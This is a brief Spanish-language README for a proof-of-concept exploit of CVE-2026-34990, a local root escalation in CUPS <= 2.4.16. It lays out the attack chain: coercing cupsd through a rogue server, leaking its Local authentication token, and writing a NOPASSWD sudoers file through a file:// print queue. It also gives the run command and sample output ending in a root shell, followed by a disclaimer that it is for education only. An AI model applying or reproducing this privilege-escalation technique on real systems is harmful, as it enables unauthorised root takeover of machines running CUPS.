
PoC mínimo para CVE-2026-34990: escalada de privilegios local en CUPS <= 2.4.16 que filtra el token de autenticación Local de cupsd y escribe un fragmento de sudoers NOPASSWD como root.
Escalada de privilegios local contra CUPS <= 2.4.16 ejecutándose como root. Filtra el token de autenticación Local de cupsd y luego escribe un fragmento de sudoers NOPASSWD como root mediante una cola de impresión file://.
python3 poc.py
Si tiene éxito:
[*] CVE-2026-34990 | user=ctfplayer | cupsd=127.0.0.1:631
[*] coercing cupsd - rogue server ...
[+] captured token: f4a8...c31b
[*] writing sudoers ...
[+] wrote /etc/sudoers.d/ctfplayer-pwn
[+] ROOT: uid=0(root) gid=0(root) groups=0(root)
[*] run: sudo -i
Luego:
sudo -i
Este script está destinado únicamente a fines educativos. El autor no se hace responsable de ningún uso indebido o daño causado por este exploit. ¡Asegúrate siempre de tener permiso antes de probar o explotar vulnerabilidades!